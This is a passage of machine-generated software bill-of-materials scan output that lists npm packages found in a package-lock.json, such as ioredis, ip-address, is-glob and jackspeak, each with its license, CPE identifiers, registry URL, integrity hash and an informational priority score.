f4c9c2133d427419 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: ioredis 5.10.1' title: ioredis 5.10.1 description: 'Package discovered: ioredis 5.10.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0c5e141c3ee662a0 name: ioredis version: 5.10.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:ioredis:ioredis:5.10.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/ioredis@5.10.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/ioredis/-/ioredis-5.10.1.tgz integrity: sha512-HuEDBTI70aYdx1v6U97SbNx9F1+svQKBDo30o0b9fw055LMepzpOOd0Ccg9Q6tbqmBSJaMuY0fB7yw9/vjBYCA== dependencies: '@ioredis/commands': 1.5.1 cluster-key-slot: ^1.1.0 debug: ^4.3.4 denque: ^2.1.0 lodash.defaults: ^4.2.0 lodash.isarguments: ^3.1.0 redis-errors: ^1.2.0 redis-parser: ^3.0.0 standard-as-callback: ^2.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: af1cc3d21ce4d415 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: ip-address 10.2.0' title: ip-address 10.2.0 description: 'Package discovered: ip-address 10.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 25abf70855373b85 name: ip-address version: 10.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:ip-address:ip-address:10.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ip-address:ip_address:10.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ip_address:ip-address:10.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ip_address:ip_address:10.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ip:ip-address:10.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ip:ip_address:10.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/ip-address@10.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/ip-address/-/ip-address-10.2.0.tgz integrity: sha512-/+S6j4E9AHvW9SWMSEY9Xfy66O5PWvVEJ08O0y5JGyEKQpojb0K0GKpz/v5HJ/G0vi3D2sjGK78119oXZeE0qA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 5ea31e6ac67f4d75 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: ipaddr.js 1.9.1' title: ipaddr.js 1.9.1 description: 'Package discovered: ipaddr.js 1.9.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c7a7f0ed243b0857 name: ipaddr.js version: 1.9.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:ipaddr.js:ipaddr.js:1.9.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/ipaddr.js@1.9.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/ipaddr.js/-/ipaddr.js-1.9.1.tgz integrity: sha512-0KI/607xoxSToH7GjN1FfSbLoU0+btTicjsQSWQlh/hZykN8KpmMf7uYwPW3R+akZ6R/w18ZlXSHBYXiYUPO3g== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: fae14e02f5662aa3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: is-arrayish 0.3.4' title: is-arrayish 0.3.4 description: 'Package discovered: is-arrayish 0.3.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 88ac3450fc3712b8 name: is-arrayish version: 0.3.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:is-arrayish:is-arrayish:0.3.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is-arrayish:is_arrayish:0.3.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_arrayish:is-arrayish:0.3.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_arrayish:is_arrayish:0.3.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is:is-arrayish:0.3.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is:is_arrayish:0.3.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/is-arrayish@0.3.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.3.4.tgz integrity: sha512-m6UrgzFVUYawGBh1dUsWR5M2Clqic9RVXC/9f8ceNlv2IcO9j9J/z8UoCLPqtsPBFNzEpfR3xftohbfqDx8EQA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f590fee2d4fea15c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: is-binary-path 2.1.0' title: is-binary-path 2.1.0 description: 'Package discovered: is-binary-path 2.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 12d3bfff6ef69b2c name: is-binary-path version: 2.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:is-binary-path:is-binary-path:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is-binary-path:is_binary_path:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_binary_path:is-binary-path:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_binary_path:is_binary_path:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is-binary:is-binary-path:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is-binary:is_binary_path:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_binary:is-binary-path:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_binary:is_binary_path:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is:is-binary-path:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is:is_binary_path:2.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/is-binary-path@2.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/is-binary-path/-/is-binary-path-2.1.0.tgz integrity: sha512-ZMERYes6pDydyuGidse7OsHxtbI7WVeUEozgR/g7rd0xUimYNlvZRE/K2MgZTjWy725IfelLeVcEM97mmtRGXw== dependencies: binary-extensions: ^2.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 3e8a78c5009c1819 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: is-core-module 2.16.1' title: is-core-module 2.16.1 description: 'Package discovered: is-core-module 2.16.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9f592f96ab7392ec name: is-core-module version: 2.16.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:is-core-module:is-core-module:2.16.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is-core-module:is_core_module:2.16.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_core_module:is-core-module:2.16.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_core_module:is_core_module:2.16.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is-core:is-core-module:2.16.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is-core:is_core_module:2.16.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_core:is-core-module:2.16.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_core:is_core_module:2.16.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is:is-core-module:2.16.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is:is_core_module:2.16.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/is-core-module@2.16.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/is-core-module/-/is-core-module-2.16.1.tgz integrity: sha512-UfoeMA6fIJ8wTYFEUjelnaGI67v6+N7qXJEvQuIGa99l4xsCruSYOVSQ0uPANn4dAzm8lkYPaKLrrijLq7x23w== dependencies: hasown: ^2.0.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: bb2d7c3406b84981 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: is-extglob 2.1.1' title: is-extglob 2.1.1 description: 'Package discovered: is-extglob 2.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b2879743f62f2c47 name: is-extglob version: 2.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:is-extglob:is-extglob:2.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is-extglob:is_extglob:2.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_extglob:is-extglob:2.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_extglob:is_extglob:2.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is:is-extglob:2.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is:is_extglob:2.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/is-extglob@2.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz integrity: sha512-SbKbANkN603Vi4jEZv49LeVJMn4yGwsbzZworEoyEiutsN3nJYdbO36zfhGJ6QEDpOZIFkDtnq5JRxmvl3jsoQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 437e0c6e090c00f1 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: is-fullwidth-code-point 3.0.0' title: is-fullwidth-code-point 3.0.0 description: 'Package discovered: is-fullwidth-code-point 3.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 8a7d27e13373f9f8 name: is-fullwidth-code-point version: 3.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:is-fullwidth-code-point:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is-fullwidth-code-point:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_fullwidth_code_point:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_fullwidth_code_point:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is-fullwidth-code:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is-fullwidth-code:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_fullwidth_code:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_fullwidth_code:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is-fullwidth:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is-fullwidth:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_fullwidth:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_fullwidth:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/is-fullwidth-code-point@3.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz integrity: sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8b982d6ae21c367b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: is-glob 4.0.3' title: is-glob 4.0.3 description: 'Package discovered: is-glob 4.0.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 6a2e0a343ed2b45b name: is-glob version: 4.0.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:is-glob:is-glob:4.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is-glob:is_glob:4.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_glob:is-glob:4.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_glob:is_glob:4.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is:is-glob:4.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is:is_glob:4.0.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/is-glob@4.0.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/is-glob/-/is-glob-4.0.3.tgz integrity: sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg== dependencies: is-extglob: ^2.1.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f5c20bc28d065782 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: is-number 7.0.0' title: is-number 7.0.0 description: 'Package discovered: is-number 7.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 19d61645d0264090 name: is-number version: 7.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:is-number:is-number:7.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is-number:is_number:7.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_number:is-number:7.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_number:is_number:7.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is:is-number:7.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is:is_number:7.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/is-number@7.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz integrity: sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 1ec1886de995b530 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: is-stream 2.0.1' title: is-stream 2.0.1 description: 'Package discovered: is-stream 2.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0d47a7f43264d12f name: is-stream version: 2.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:is-stream:is-stream:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is-stream:is_stream:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_stream:is-stream:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_stream:is_stream:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is:is-stream:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is:is_stream:2.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/is-stream@2.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz integrity: sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: cd8dbd159ce77812 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: is-url 1.2.4' title: is-url 1.2.4 description: 'Package discovered: is-url 1.2.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0055323086e6dbe0 name: is-url version: 1.2.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:is-url:is-url:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is-url:is_url:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_url:is-url:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is_url:is_url:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is:is-url:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:is:is_url:1.2.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/is-url@1.2.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/is-url/-/is-url-1.2.4.tgz integrity: sha512-ITvGim8FhRiYe4IQ5uHSkj7pVaPDrCTkNd3yq3cV7iZAcJdHTUMPMEHcqSOy9xZ9qFenQCvi+2wjH9a1nXqHww== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 25f78dcaa669e646 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: isarray 1.0.0' title: isarray 1.0.0 description: 'Package discovered: isarray 1.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 14ac0fadd6b69d11 name: isarray version: 1.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:isarray:isarray:1.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/isarray@1.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz integrity: sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b4f550816fd1d6a8 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: isexe 2.0.0' title: isexe 2.0.0 description: 'Package discovered: isexe 2.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 18556628c2ed871d name: isexe version: 2.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:isexe:isexe:2.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/isexe@2.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz integrity: sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 399923db78bd2f5d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: jackspeak 3.4.3' title: jackspeak 3.4.3 description: 'Package discovered: jackspeak 3.4.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 668b76a592331d7f name: jackspeak version: 3.4.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BlueOak-1.0.0 spdxExpression: BlueOak-1.0.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:jackspeak:jackspeak:3.4.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/jackspeak@3.4.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz integrity: sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw== dependencies: '@isaacs/cliui': ^8.0.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c7be600d2bcad0a1 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: jay-peg 1.1.1' title: jay-peg 1.1.1 description: 'Package discovered: jay-peg 1.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c5304af01a3223ed name: jay-peg version: 1.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:jay-peg:jay-peg:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:jay-peg:jay_peg:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:jay_peg:jay-peg:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:jay_peg:jay_peg:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: 